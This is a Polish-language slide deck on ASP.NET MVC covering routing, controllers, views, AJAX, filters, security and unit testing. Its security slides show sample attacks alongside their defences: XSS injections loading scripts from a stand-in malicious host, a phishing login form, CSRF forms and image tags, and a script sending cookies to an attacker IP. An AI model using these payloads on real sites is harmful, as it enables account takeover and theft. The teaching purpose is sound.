ASP.NET MVC - najważniejsze założenia

3,040 views

Published on

Przegląd najważniejszych założeń technologii ASP.NET MVC. Omówienie mechanizmów routingu, kontrolerów, widoków, bezpieczeństwa, walidacji danych, AJAX oraz rozszerzalności platformy. Prezentacja obejmuje fundamentalne założenia ASP.NET MVC 1, pozostające w większości nadal aktualne a także wybrane nowe mechanizmy ASP.NET MVC 2 i ASP.NET MVC 3.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
 • Be the first to comment

 • Be the first to like this

No Downloads
Views
Total views
3,040
On SlideShare
0
From Embeds
0
Number of Embeds
34
Actions
Shares
0
Downloads
28
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

ASP.NET MVC - najważniejsze założenia

 1. 1. ASP.NET MVC główne założenia Bartłomiej Zass Microsoft
 2. 2. MVC w Internecie • Ruby on Rails (LAMP) – Convention over Configuration – Don’t Repeat Yourself (Keep it DRY) – Routing: map.connect ‘:controller/:action/:id’ • DJANGO (Python) – Regex – mapowanie metoda-URL – (r’^(?P<object_id>d+)/products/category/$’, ‘store. products.view’), • Spring, Struts, JSF(JAVA) • ZEND Framework (ZF) – PHP • MonoRail / Castle Project – ASP.NET • ASP.NET MVC!
 3. 3. Założenia ASP.NET MVC • „Convention over configuration” • „DRY” (don’t repeat yourself) • Maksymalna elastycznośd, rozszerzalnośd • Serwowanie metod – nie plików • Zejdź mi z drogi! • Dlaczego nie WebForms?! – RAD – podobnie jak aplikacje okienkowe – Często chcemy wiedzied co się dzieje pod spodem i mied więcej kontroli – Cykl życia strony i kontrolek (własny) – Całkowicie własny model zdarzeo (TextChanged, Click, itp. oraz zdarzenia strony) – Własne zarządzanie stanem – ViewState – Warstwa abstrakcji – czasem niezastąpiona, czasem uciążliwa
 4. 4. Problemy z WebForms • ViewState • Trudna kontrola nad renderowanym kodem • Client Ids – ctl00$ContentPlaceHolder1$UserControl1$TextBox1 – Problemy z JavaScript • Testy jednostkowe – Symulacja cyklu życia strony poza IIS – Konieczne wykorzystanie zaawansowanych narzędzi takich jak TypeMock
 5. 5. ASP.NET MVC w akcji
 6. 6. ROUTING
 7. 7. Routing • RESTowy format URLi – Usability (łatwiej zapamiętad, zmienid) – SEO* • NIE odzwierciedla fizycznej lokalizacji! • Cele routingu w ASP.NET MVC – Mapowanie do akcji kontrolera – Konstruowanie URLi • Global.asax var routes = new RouteCollection(); GlobalApplication.RegisterRoutes(routes);
 8. 8. // Zasada działania routes.MapRoute(‚simple‛, ‚{first}/{second}/{third}‚); // --- /products/display/123 {first} = products {second} = display {third} = 123 /foo/bar/baz {first} = foo {second} = bar {third} = baz /a.b/c-d/e-f {first} = ‚a.b‛ {second} = ‚c-d‛ {third} = ‚e-f‛
 9. 9. // Coś bardziej pożytecznego routes.MapRoute(‚simple‛, ‚{controller}/{action}/{id}‚); // /products/display/123 public class ProductsController : Controller { public ActionResult Display(int id) { //Do something return View(); } }
 10. 10. // Przykłady formatów site/{controller}/{action}/{id} // /products/display/123 -  // /site/products/display/123 -  // Można: {language}-{country}/{controller}/{action} {controller}.{action}.{id} service/{action}-{format} (/service/display-xml) {reporttype}/{year}/{month}/{date} (/sales/2008/1/23) // Nie można: {controller}{action}/{id}
 11. 11. // Mniej oczywiste przykłady Book{title}and{foo} {filename}.{ext} Algorytm zachłanny: /asp.net.mvc.xml – filename=asp.net.mvc (nie asp) My{location}-{sublocation} /MyHouse-LivingRoom (location=„House‛, sublocation=„LivingRoom‛) {foo}xyz{bar} /xyzxyzxyzblah (foo=„xyzxyz‛ – zachłannie; bar=„blah‛)
 12. 12. // Wartości domyślne public class ProductsController : Controller { public ActionResult List() { } } // ---- {controller}/{action} /products/list – OK /products/list/1 – nie zadziała, konieczny drugi route  {controller}/{action}/{id} Zamiast nowej trasy – wartość domyślna (RouteValueDictionary) routes.MapRoute(‚simple‛, ‚{controller}/{action}/{id}‚, new {id = ‚‛}); // ---- routes.MapRoute(‚simple‛, ‚{controller-action}‚, new {action=‛index‛}); // /products- ?? NIE – w segmencie (pomiędzy „/‛) muszą być wszystkie parametry // W tym przypadku action=index istotne tylko przy generowaniu adresów URL
 13. 13. // Constraints – dodatkowe ograniczenia (regex) routes.MapRoute(‚blog‛, ‚{year}/{month}/{day}‚, new {controller=‛blog‛, action=‛index‛}, new {year=@‚d{4}‚, month=@‚d{2}‚, day=@‚d{2}‚}); //------------------------------------ // Constraints nie muszą być stringiem // Własne constraints public interface IRouteConstraint { bool Match(…); } // „Z pudełka‛ – implementuje HttpMethodConstraint routes.MapRoute(‚name‛, ‚{controller}‚, null, new {httpMethod = new HttpMethodConstraint(‚GET‛)} );
 14. 14. // Parametr catch-all routes.MapRoute(‚catchallroute‛, ‚query/{query-name}/{*extrastuff}‚); /* /query/select/a/b/c – extrastuff = „a/b/c‛ /query/select/a/b/c/ - extrastuff = „a/b/c‛ /query/select/ - extrastuff = „‛ (OK) */
 15. 15. // Ignorowanie trasy routes.Add(new Route ( ‚{resource}.axd/{*pathInfo}‚, new StopRoutingHandler() )); // /Webresource.axd // Przekazuje request do standardowego handlera ASP.NET // Domyślnie przy route.MapRoute – MVCRouteHandler // możliwe przekazanie własnej implementacji IRouteHandler // Prościej: routes.IgnoreRoute(‚{resource}.axd/{*pathInfo}‚);
 16. 16. Reverse - routing • RouteCollection (kolekcja RouteBase) – Dla każdej trasy pytanie – czy możesz wygenerowad URL przy pomocy tych parametrów? • Route.GetVirtualPath – Jeśli tak – VirtualPathData z adresem URL – Jeśli nie – null • Uwaga: wartości domyślne, które nie są parametrem muszą się zgadzad – Todo/{action}; defaults: controller=home;action=index – Podajemy: Controller=„blah”, action=„cokolwiek” – NIE – Controller=„home”; action=„any” – TAK • Trasy nazwane – parametr do GetVirtualPath • GetVirtualPath wykorzystuje parametry z Defaults – Np. piszemy uniwersalną kontrolkę do nawigacji (dalej…)
 17. 17. // Ponieważ jest action na liście defaults – match public static void RegisterRoutes(RouteCollection routes) { routes.MapRoute(null, ‚todo/{action}/{page}‚, new {controller=‛todo‛, action=‛list‛, page=0 }); } public string NextPageUrl(int currentPage, RouteCollection routes) { int nextPage = currentPage + 1; VirtualPathData vp = routes.GetVirtualPath(null, new RouteValueDictionary(new {page = nextPage})); if(vp != null) { return vp.VirtualPath; } return null; }
 18. 18. // „Overflow parameters‛ // Dodatkowe parametry do generacji URL (np. query // string, itp.). routes.Add(new Route("forum/{user}/{action}", new MvcRouteHandler()) { Defaults = new RouteValueDictionary{ {"controller", "forum"}, {"user", "admin"}} }); VirtualPathData vp2 = routes.GetVirtualPath(null, new RouteValueDictionary(new { action = "Index" , controller = "forum", param= "Bartek" })); // controller – nie ma w URL, musi się zgadzać z default // (=forum) // param – jako querystring
 19. 19. Routing pipeline 1. URLRoutingModule próbuje znaleźd pasującą trasę w statycznej RouteTable.Routes - GetRouteData() na RouteBase – null lub kolekcja 2. Znaleziono trasę (pierwszy wygrywa) -> pobieramy IRouteHandler - Dla MVC: MvcRouteHandler 3. IRouteHandler.GetHandler -> IHttpHandler - Dla MVC: MvcHandler 4. IHttpHandler.ProcessRequest MvcHandler odpowiedzialny za wybór kontrolera
 20. 20. Web Forms + MVC Uwaga na uwierzytelnienie! ŹLE <?xml version=‛1.0‛?> <configuration> <system.web> <authorization> <deny users=‛*‚ /> </authorization> </system.web> </configuration> DOBRZE UrlAuthorizationModule.CheckUrlAccessForPrincipal(this.Vir tualPath, requestContext.HttpContext.User, requestContext.HttpContext.Request.HttpMethod)
 21. 21. Routing i ASP.NET Web Forms
 22. 22. KONTROLERY
 23. 23. Routing i co dalej? • MVCHandler.ProcessRequest – Wypełnia RequestContext.RouteData • ControllerFactory -> IController – IController.Execute() public interface IController { void Execute(RequestContext requestContext); } • Domyślny ControllerFactory – szuka klasy w odpowiednim katalogu, dodaje „Controller” do parametru z RouteData
 24. 24. Najprostszy kontroler public class SimpleController : IController { public void Execute(RequestContext requestContext) { var response = requestContext.HttpContext.Response; response.Write(‚<h1>Hello World!</h1>‛); } } // Podobieństwo do IHTTPHandler // Główna różnica – RequestContext zamiast HttpContext // (dodatkowe informacje związane z requestem MVC) // Klasa abstrakcyjna ControllerBase – wyższy poziom // Właściwości TempData, ViewData, itp.
 25. 25. ABC kontrolera • Controller (dziedziczy po ControllerBase) – Po niej z reguły powinna dziedziczyd klasa kontrolera w ASP.NET MVC • Domyślnie wszystkie publiczne metody bezpośrednio dostępne z URL – tzw. „Akcje” kontrolera – Security! – Dziedzicząc po Controller wyrażamy na to zgodę • /simple2/hello -> Simple2Controller.Hello • Parametry – querystring lub URL – Musi zgadzad się z nazwą zmiennej metody
 26. 26. Akcja kontrolera - przykład public void Distance(int x1, int y1, int x2, int y2) { double xSquared = Math.Pow(x2 - x1, 2); double ySquared = Math.Pow(y2 - y1, 2); Response.Write(Math.Sqrt(xSquared + ySquared)); } /simple2/distance?x2=1&y2=2&x1=0&y1=0 routes.MapRoute(‚distance‛, ‚simple2/distance/{x1},{y1}/{x2},{y2}‚, new { Controller = ‚Simple2‛, action = ‚Distance‛ } ); /simple2/distance/0,0/1,2
 27. 27. ActionResult • Response.Write – Kto ma na to czas?  – Tracimy funkcjonalnośd ASP.NET – np. Master Pages • Kontroler zwraca ActionResult – Wzorzec „Command” (późniejsze wywołanie kodu - np. Undo) public abstract class ActionResult { public abstract void ExecuteResult(ControllerContext context); }
 28. 28. ActionResult – c.d. • Wiele typów odpowiedzi (dziedziczą po ActionResult) – Np. ViewResult • ActionInvoker w późniejszej fazie wywołuje Execute na zwróconym obiekcie • Metody pomocnicze (XYZResult wyjątkiem RedirectToAction)
 29. 29. public ActionResult ListProducts() { //Pseudo code IList<Product> products = SomeRepository.GetProducts(); ViewData.Model = products; return new ViewResult {ViewData = this.ViewData }; } // Krócej: public ActionResult ListProducts() { //Pseudo code IList<Product> products = SomeRepository.GetProducts(); return View(products); }
 30. 30. Typy domyślnych ActionResult ActionResult Opis EmptyResult Nic nie robi ContentResult Odpowiedź jako tekst JsonResult Serializuje obiekt do JSON RedirectResult Przekierowuje do URL RedirectToRouteResult Przekierowuje na podstawie Routingu ViewResult Uruchamia renderowanie widoku przez ViewEngine PartialViewResult Częśd widoku (np. kontrolka) – AJAX FileResult Różne odmiany – zwraca plik JavaScriptResult Wysyła i wywołuje natychmiast JavaScript po stronie klienta
 31. 31. ActionResults c.d. • ContentResult – Wykorzystywane, kiedy metoda zwraca inny typ niż ActionResult (void i null – EmptyResult) – wygodne TESTY! • FileResult (abstract), return File() – FilePathResult – FileContentResult – FileStreamResult • JsonResult, return Json() – Uwaga na drzewo obiektu
 32. 32. JavascriptResult public ActionResult DoSomething() { script s = ‚$(‘#some-div’).html(‘Updated!’);‛; return JavaScript(s); } <%= Ajax.ActionLink(“click”, “DoSomething”, new AjaxOptions()) %> <div id=”some-div”></div>
 33. 33. ViewResult • Wywołuje IViewEngine.FindView() – Zwraca IView – IView.Render() – Domyślnie - przeszukiwane konkretne katalogi • ASPX, ASCX
 34. 34. Action Invoker • Routing – wypełnił tylko RouteData – Tak naprawdę nie wywołuje metody kontrolera • ControllerActionInvoker - faktycznie wywołuje akcję kontrolera – Dostępny w IController.ActionInvoker – Lokalizuje metodę (Reflection ze stringa) – Mapuje parametry – Wywołuje metodę i jej filtry – Wywołuje ExecuteResult na zwróconym ActionResult
 35. 35. Wywoływanie metod • Dostępna każda metoda, która: – Nie jest oznaczona [NonAction] – Nie jest konstruktorem, właściwością, zdarzeniem – Nie jest orginalnie zdefiniowana w Object (np. ToString()) lub Controller (np. Dispose() i View()) • Dodatkowe atrybuty – [ActionName(„View”)+ – ActionSelectorAttribute
 36. 36. ActionSelectorAttribute public abstract class ActionSelectorAttribute : Attribute { public abstract bool IsValidForRequest(ControllerContext controllerContext, MethodInfo methodInfo); } // Invoker zawsze zadaje to pytanie // Jeśli false – metoda nie będzie wywołana /* – [AcceptVerbs(HttpVerbs.Post)] – [NonAction] */
 37. 37. Mapowanie parametrów • Źródła parametrów akcji – Request.Form – Route Data – Request.Querystring • UpdateModel() – <%= Html.TextBox(“ProductName”) %> – ViewData*„product”+; • Walidacja – IDataErrorInfo lub atrybuty (MVC 2) – ModelState.AddError
 38. 38. Walidacja z model binderami public class Product : IDataErrorInfo { … } // Podsumowanie wszystkich błędów public string Error { get { … } } // Błąd dla konkretnej właściwości public string this[string columnName] { Get { … } }
 39. 39. WIDOKI
 40. 40. Domyślne widoki <%@ Page Language=‛C#‚ MasterPageFile=‛~/Views/Shared/Site.Master‛ Inherits=‛System.Web.Mvc.ViewPage‛ %> <asp:Content ID=‛indexTitle‛ ContentPlaceHolderID=‛TitleContent‛ runat=‛server‛> Home Page </asp:Content> <asp:Content ID=‛indexContent‛ ContentPlaceHolderID=‛MainContent‛ runat=‛server‛> <h2><%= Html.Encode(ViewData[‚Message‛]) %></h2> <p> To learn more about ASP.NET MVC visit <a href=‛http://asp.net/mvc‛ title=‛ASP.NET MVC Website‛>http://asp.net/mvc</a>. </p> </asp:Content>
 41. 41. Widoki • Dziedziczy po ViewPage / ViewPage<T> – …która dziedziczy po System.Web.UI.Page • Nie ma <form runat=„server”> – Teoretycznie może byd – możemy umieszczad kontrolki! – Wysoce niezalecane – kontrolki serwerowe zawierają „kawałki” kontrolera – MVC nie obsługuje ViewState, IsPostBack, itp. • To nie jest stare ASP – ASP miało M, V i C w jednym pliku • Zwracanie widoków – return View() – zgodnie z nazwą akcji – return View(„SpecificView”) – return View(„~/Some/Other/View.aspx”);
 42. 42. // Słabo typowane widoki public ActionResult List() { var products = new List<Product>(); for(int i = 0; i < 10; i++) { products.Add(new Product {ProductName = ‚Product ‚ + i}); } ViewData[‚Products‛] = products; return View(); } <ul> <% foreach(Product p in (ViewData[‚Products‛] as IEnumerable<Product>)) {%> <li><%= Html.Encode(p.ProductName) %></li> <% } %> </ul>
 43. 43. // Silnie typowane widoki public ActionResult List() { var products = new List<Product>(); for(int i = 0; i < 10; i++) { products.Add(new Product {ProductName = ‚Product ‚ + i}); } return View(products); } <%@ Page Language=‛C#‚ MasterPageFile=‛~/Views/Shared/Site.Master‛ Inherits=‛System.Web.Mvc.ViewPage<IEnumerable<Product>>‛ %> … <ul> <% foreach(Product p in Model) {%> <li><%= Html.Encode(p.ProductName) %></li> <% } %> </ul>
 44. 44. HTML Helpers <% %> vs <%= %> i zapomniany średnik <%= Html.ActionLink(‚Link Text‛, ‚Withdraw‛, ‚Account‛) %> <%= Html.ActionLink(‚Link Text‛, ‚Withdraw‛, ‚Account‛, new {id=34231}, null) %> <%= Html.RouteLink(‚Link Text‛, new {action=‛ActionX‛}) %> -> <a href=‛/Home/About‛>LinkText</a> <% using(Html.BeginForm(„action‛, „controller‛)) { %> <% } %> Lub <% Html.BeginForm(); %> (…) <% Html.EndForm(); %>
 45. 45. HTML Helpers – c.d. <%= Html.Encode(string) %> <%= Html.Hidden(‚wizardStep‛, ‚1‛) %> <%= Html.DropDownList(„lista") %> <%= Html.Password(‚my-password‛) %> <%= Html.RadioButton(‚color‛, ‚red‛) %> <%= Html.RadioButton(‚color‛, ‚blue‛, true) %> <%= Html.RadioButton(‚color‛, ‚green‛) %> <% Html.RenderPartial(‚MyUserControl‛); %>
 46. 46. HTML Helpers – c.d. <%= Html.TextArea(‚text‛, ‚hello <br/> world‛) %> // Kontroler: ViewData[‚Name‛] = product.Name; <%= Html.TextBox(‚Name‛) %> // Kontroler: ViewData[„Name‛] = product; <%= Html.TextBox(‚Product.Name‛) %> // Dodatkowe atrybuty <%= Html.TextBox(‚Name‛, null, new {@class=‛klasa‛}) %> <%= Html.ValidationMessage(‚Name‛) %> <span class=‛field-validation-error‛>Ouch</span> <%= Html.ValidationMessage(‚Name‛, ‚Wlasny kom.!‛) %>
 47. 47. Walidacja public ActionResult Index() { var modelState = new ModelState(); modelState.Errors.Add(‚Ouch‛); ModelState[‚Name‛] = modelState; // lub ModelState.AddModelError(„Age", „Ojj"); return View(); } // Opcjonalnie – dodatkowy komunikat podsumowujący <%= Html.ValidationSummary() %> <ul class=‛validation-summary-errors‛> <!-- <span>An error occurred</span> --> <li>Ouch</li> <li>Ouch</li> </ul>
 48. 48. View Engine • ViewResult iteruje po ViewEngines.Engines i pyta kto może wyrenderowad widok – Pierwszy wygrywa • Domyślnie - System.Web.Mvc.WebFormViewEngine • IViewEngine.FndView -> Iview • IView.Render protected void Application_Start() { ViewEngines.Engines.Clear(); ViewEngines.Engines.Add(new MyViewEngine()); RegisterRoutes(RouteTable.Routes); }
 49. 49. Inaczej - NHAML %h2= ViewData.CategoryName %ul - foreach (var product in ViewData.Products) %li = product.ProductName .editlink = Html.ActionLink("Edit", new { Action="Edit", ID=product.ProductID }) = Html.ActionLink("Add New Product", new { Action="New" })
 50. 50. Inaczej - NVelocity #foreach($person in $people) #beforeall <table> <tr><th>Name</th><th>Age</th></tr> #before <tr #odd Style=’color:gray’> #even Style=’color:white’> #each <td>$person.Name</td><td>$person.Age</td> #after </tr> #between <tr><td colspan=’2’>$person.bio</td></tr> #afterall </table> #nodata Sorry No Person Found #end
 51. 51. Inaczej - Spark <viewdata model=‛IEnumerable[[Person]]‚/> <ul class=‛people‛> <li each=‛var person in ViewData.Model‛> ${person.LastName}, ${person.FirstName} </li> </ul>
 52. 52. View Engine czy ActionResult • Własny ActionResult – Np. MyCustomXMLActionResult – Prosty do zwrócenia – Idealny, kiedy nie potrzebujemy szablonu • View Engine – Zawsze, kiedy potrzebujemy dodatkowego pliku, który opisuje format zwracanej odpowiedzi – Np. XSLTViewEngine
 53. 53. AJAX
 54. 54. Microsoft AJAX <%using (Ajax.BeginForm(‚HelloAjax‛, new AjaxOptions { UpdateTargetId = ‚results‛ })) { %> <%= Html.TextBox(‚query‛, null, new {size=40}) %> <input type=‛submit‛ /> <%} %> <div id=‛results‛> </div> // ----- public string HelloAjax(string query) { return ‚You entered: ‚ + query; }
 55. 55. POST /home/HelloAjax HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://localhost.:55926/home x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=utf-8 ... query=Hello%20Ajax!&X-Requested-With=XMLHttpRequest // Rozpoznawanie, że mamy do czynienia z AJAX request public ActionResult HelloAjax(string query) { //make sure this is an Asynch post if (Request.IsAjaxRequest()) { return Content(‚You entered: ‚ + query); } else { return RedirectToAction(‚Index‛, new { query = query }); } } // Ten sam znacznik rozpoznawany przez jQuery
 56. 56. Partial Views i AJAX // Co jeśli chcemy zwrócić coś więcej niż string? // np. rezultat wyszukiwania w postaci HTML // Rozwiązanie – partial views if(Request.IsAjaxRequest()) { // Partial View return View(‚ProductSearchResults‛, products); } else { return View(products); } <div id=‛results‛> <%Html.RenderPartial(‚ProductSearchResults‛, ViewData.Model); %> </div>
 57. 57. To samo w jQuery // jQuery.form plugin <form action=‛<%=Url.Action(‚ProductSearch‛) %>‛ method=‛post‛ id=‛jform‛> <%= Html.TextBox(‚query‛, null, new {size=40}) %> <input type=‛submit‛ id=‛jsubmit‛ value=‛go‛ /> </form> <div id=‛results2‛> <%Html.RenderPartial(‚ProductSearchResults‛, ViewData.Model); %> </div> <script src=‛/Scripts/jquery-1.3.2.js‛ type=‛text/javascript‛></script> <script src=‛/Scripts/jquery-form.js‛ type=‛text/javascript‛></script> <script type=‛text/javascript‛> $(document).ready(function() { $(‘#jform’).submit(function() { $(‘#jform’).ajaxSubmit({ target: ‘#results2’ }); return false; }); }); </script> // Inne opcje: url, type, beforeSubmit, Success, dataType, resetForm, // clearForm
 58. 58. Extendery - Autocomplete <script type=‛text/javascript‛> Sys.Application.add_init(function() { $create( AjaxControlToolkit.AutoCompleteBehavior, { serviceMethod: ‘ProductNameSearch’, servicePath: ‘/ProductService.asmx’, minimumPrefixLength: 1, completionSetCount: 10 }, null, null, $get(‘query’)) }); </script>
 59. 59. Filtrowanie listy - jQuery <script language=‛javascript‛ type=‛text/javascript‛> $(document).ready(function() { $(‚#CategoryID‛).change(function() { var selection = $(‚#CategoryID‛).val(); $(‚#results‛).load(‚/home/ProductByCategory/‚ + selection); }}) }); </script>
 60. 60. Filtry
 61. 61. Filtry w ASP.NET MVC • Dostępne „z pudełka” – Authorize – HandleError – OutputCache [Authorize(Roles=‛Admins, SuperAdmins‛)] public class AdminController { //Only admins should see this. public ActionResult Index() { return View(); } //Only admins should see this. public ActionResult DeleteAllUsers() { // Jesteśmy bezpieczni } }
 62. 62. OutputCache • Cache’uje wartośd zwracaną przez akcję • Bazuje na ASP.NET @OutputCache – Właściwości: CacheProfile, Duration, Location, NoStore, SqlDepe ndency, VaryBy* – Brak VaryByControl • Dlaczego nie w widoku? • [OutputCache(Duration=60, VaryByParam=‛none‛)] – A gdybyśmy chcieli bez rekompilacji? • [OutputCache(CacheProfile=‛MyProfile‛)]
 63. 63. HandleError [HandleError(ExceptionType = typeof(ArgumentException), View=‛ArgError‛)] public ActionResult GetProduct(string name) { if(name == null) { throw new ArgumentNullException(‚name‛); } return View(); } // ŹLE [HandleError(Order=1, ExceptionType=typeof(Exception)] [HandleError(Order=2, ExceptionType=typeof(ArgumentException), View=‛ArgError‛)] public ActionResult GetProduct(string name) // LEPIEJ [HandleError(Order=1, ExceptionType=typeof(ArgumentException), View=‛ArgError‛) [HandleError(Order=2, ExceptionType=typeof(Exception)] public ActionResult GetProduct(string name)
 64. 64. Własny filtr • Np. logowanie, mierzenie czasu, kontrola dostępu • Dziedziczymy po ActionFilterAttribute (lub FilterAttribute) public virtual void OnActionExecuted(ActionExecutedContext filterContext); public virtual void OnActionExecuting(ActionExecutingContext filterContext); public virtual void OnResultExecuted(ResultExecutedContext filterContext); public virtual void OnResultExecuting(ResultExecutingContext filterContext); • Implementujemy interfejs: – IActionFilter – IResultFilter – IAuthorizationFilter* – IExceptionFilter*
 65. 65. public class TimerAttribute : ActionFilterAttribute { public TimerAttribute() { // Powinniśmy być ostatnim filtrem – tuż przed akcją this.Order = int.MaxValue; } public override void OnActionExecuting(ActionExecutingContext filterContext) { var controller = filterContext.Controller; if (controller != null) { var stopwatch = new Stopwatch(); controller.ViewData[‚__StopWatch‛] = stopwatch; stopwatch.Start(); } } public override void OnActionExecuted(ActionExecutedContext filterContext) { var controller = filterContext.Controller; if (controller != null) { var stopwatch = (Stopwatch)controller.ViewData[‚__StopWatch‛]; stopwatch.Stop(); controller.ViewData[‚__Duration‛] = stopwatch.Elapsed.TotalMilliseconds; } } // [Timer] // Trwało: <%= ViewData[‚__Duration‛] %>
 66. 66. Kolejnośd filtrów 1. Właściwośd Order 2. Najpierw dla klasy 3. Jeśli brak Order – ujemna wartośd 4. Jeśli sam kontroler implementuje np. IActionFilter – w pierwszej kolejności
 67. 67. BEZPIECZEOSTWO
 68. 68. Kilka słów o bezpieczeostwie • Więcej swobody – więcej zagrożeo – Domyślne helpery, WebFormViewEngine wiele robią za nas • XSS - Passive injection Komentarz na blogu (URL autora): <a href=‛Brak strony :<‛>Komentator</a> ‚><iframe src=‛http://zlastrona.com‛ height=‛400‛ width=„500‛ /> ‚></a><script src=‛http://trojan.zlastrona.com‛> </script> <a href=‛
 69. 69. XSS – Active Injection // Do SearchBoxa ‚<br><br>Please login with the form below before proceeding:<form action=‛mybadsite.aspx‛><table><tr><td>Login:</td><td><input type=text length=20 name=login></td></tr><tr><td>Password:</td><td><input type=text length=20 name=password></td></tr></table><input type=submit value=LOGIN></form>‛ // Działa? Hmm… <a href=‛http://testasp.acunetix.com/Search.asp?tfSearch= <br><br>Please login with the form below before proceeding:<form action=‛mybadsite.aspx‛><table><tr><td>Login:</td><td><input type=text length=20 name=login></td></tr><tr><td>Password:</td><td><input type=text length=20 name=password></td></tr></table><input type=submit value=LOGIN></form>‛>ZNAJDŹ SWOJE ZDJECIA NAGO</a>
 70. 70. XSS - zabezpieczenia • Nigdy nie ufaj danym od użytkownika • Enkoduj wyświetlane i zapisywane dane – Atrybuty – Cała zawartośd <a href=‛<%=Url.Action(‚index‛,‛home‛,new {name=Html.AttributeEncode(ViewData[‚name‛])})%>>Click here</a> <a href=‛<%=Url.Encode(Url.Action(‚index‛,‛home‛,new {name=ViewData[‚name‛]}))%>>Click here</a>
 71. 71. Cross-site Request Forgery // Dobra strona, użytkownik stale zalogowany („ZAPAMIĘTAJ MNIE‛) public class UserProfileController : Controller { public ViewResult Edit() { return View(); } public ViewResult SubmitUpdate() { ProfileData profile = GetLoggedInUserProfile(); // Update the user object profile.EmailAddress = Request.Form["email"]; profile.FavoriteHobby = Request.Form["hobby"]; SaveUserProfile(profile); ViewData["message"] = "Your profile was updated."; return View(); } } // Zapraszamy użytkownika e-mailem na naszą stronę <body onload="document.getElementById('fm1').submit()"> <form id="fm1" action="http://dobrastrona.pl/UserProfile/SubmitUpdate" method="post"> <input name="email" value=„email@hackera.pl" /> <input name="hobby" value="Defacing websites" /> </form> </body> // A teraz już tylko „forgoten password‛
 72. 72. CSRF inaczej Komentarz pod newsami banku<img src =‛ http://widelyusedbank.com?function=transfer&amount=1000 &toaccountnumber=23234554333&from=checking‛ />.
 73. 73. CSRF – jak się uchronid • Nie zmieniamy nic w GET • Specjalny zmienny token (input type=„hidden”), który porównujemy po stronie serwera – [ValidateAntiForgeryToken] – <%= Html.AntiForgeryToken() %> • Sprawdzad Referer – Niektórzy wyłączają – Ryzyko zmiany (niektóre wersje Flash) – Można zrealizowad przy pomocy filtra
 74. 74. Filtr - referer public class IsPostedFromThisSiteAttribute : AuthorizeAttribute { public override void OnAuthorize(AuthorizationContext filterContext) { if (filterContext.HttpContext != null) { if (filterContext.HttpContext.Request.UrlReferrer == null) throw new System.Web.HttpException(‚Invalid submission‛); if (filterContext.HttpContext.Request.UrlReferrer.Host != ‚mysite.com‛) throw new System.Web.HttpException (‚This form wasn’t submitted from this site!‛); } } } [IsPostedFromThisSite] public ActionResult Register(…)
 75. 75. Kradzież ciastek () • Często tickety uwierzytelniające – StackOverflow.com (beta) • XSS <img src=‛‚http://www.a.com/a.jpg<script type=text/javascript src=‛http://1.2.3.4:81/xss.js‛>‛ /><<img src=‛‚http://www.a.com/a.jpg</script>‛ • Xss.js – transfer ciastek window.location=‛http://1.2.3.4:81/r.php?u=‛ +document.links[1].text +‛&l=‛+document.links[1] +‛&c=‛+document.cookie;
 76. 76. Ciastka – jak je zabezpieczyd? • Uchroo się przed XSS – przemyśl dobrze zanim napiszesz własną implementację anti- XSS – http://antixss.codeplex.com • Cookies HTTPOnly Response.Cookies[‚MyCookie‛] .Value=‛Remembering you…‛; Response.Cookies[‚MyCookie].HttpOnly=true;
 77. 77. Bezpieczeostwo - inne • Komunikaty o błędach – <compilation debug=„true”> • Zabezpieczanie kontrolerów, nie ścieżki – [Authorize] • Zabezpieczanie publicznych metod – [NonAction] • Uwaga na Model Binders (dalej…)
 78. 78. Model Binders // Ryzykowne zwłaszcza, kiedy ktoś zobaczy nasz // kod źródłowy (jakie właściwości ma User) <form action=http://naszastrona.pl/profile/update method=‛post‛> <input type=‛text‛ name=‛First‛ value=‛Darth‛ /> <input type=‛text‛ name=‛Last‛ value=‛Vader‛ /> <input type=‛text‛ name=‛Role‛ value=‛PanIWladca‚ /> </form> // public ActionResult Update(User user) // Model binder automatycznie ustawi Role // Rozwiązanie: whitelist [ValidateAntiforgeryToken] public ActionResult Update([Bind(Include=‛First, Last‛)]User user)
 79. 79. TESTY JEDNOSTKOWE
 80. 80. TDD i ASP.NET • ASP.NET Web Forms – Trudne do testowania – Wiele elementów zależnych od IIS • ASP.NET MVC – Dużo nacisku na modularną architekturę – Dobra integracja z frameworkami do „mockowania” – Integracja z wybranym frameworkiem do testów – np. nUnit, mbUnit, Xunit, Visual Studio, …
 81. 81. Routing – przykładowy test [TestMethod] public void CanMapNormalControllerActionRoute() { //arrange RouteCollection routes = new RouteCollection(); MvcApplication.RegisterRoutes(routes); var httpContextMock = new Mock<HttpContextBase>(); httpContextMock.Expect(c => c.Request .AppRelativeCurrentExecutionFilePath).Returns(‚~/product/list‛); //act RouteData routeData = routes.GetRouteData(httpContextMock.Object); //assert Assert.IsNotNull(routeData, ‚Should have found the route‛); Assert.AreEqual(‚product‛, routeData.Values[‚Controller‛]); Assert.AreEqual(‚list‛, routeData.Values[‚action‛]); Assert.AreEqual(‚‛, routeData.Values[‚id‛]); }
 82. 82. Kontroler – przykładowy test public ActionResult Save(string value) { TempData[‚TheValue‛] = value; return RedirectToAction(‚Display‛); } [TestMethod] public void SaveStoresTempDataValueAndRedirectsToFoo() { // Arrange var controller = new HomeController(); // Act var result = controller.Save(‚is 42‛) as RedirectToRouteResult; // Assert Assert.IsNotNull(result, ‚Expected the result to be a redirect‛); Assert.AreEqual(‚is 42‛, controller.TempData[‚TheValue‛]; Assert.AreEqual(‚Display‛, result.Values[‚action‛]); }
 83. 83. View Helpers – przykładowy test public static string UnorderedList<T>(this HtmlHelper html, IEnumerable<T> items) [TestMethod] public void UnorderedListWithIntArrayRendersUnorderedListWithNumbers() { var contextMock = new Mock<HttpContextBase>(); var controllerMock = new Mock<IController>(); var cc = new ControllerContext(contextMock.Object, new RouteData(), controllerMock.Object); var viewContext = new ViewContext(cc, ‚n/a‛, ‚n/a‛, new ViewDataDictionary(), new TempDataDictionary()); var vdcMock = new Mock<IViewDataContainer>(); var helper = new HtmlHelper(viewContext, vdcMock.Object); string output = helper.UnorderedList(new int[] {0, 1, 2 }); Assert.AreEqual(‚<ul><li>0</li><li>1</li><li>2</li></ul>‛, output); }
 84. 84. Widok – przykładowy test // …nie powinno być co testować – nie spotyka się // często testów
 85. 85. CO NOWEGO W ASP.NET MVC 2? (wybrane)
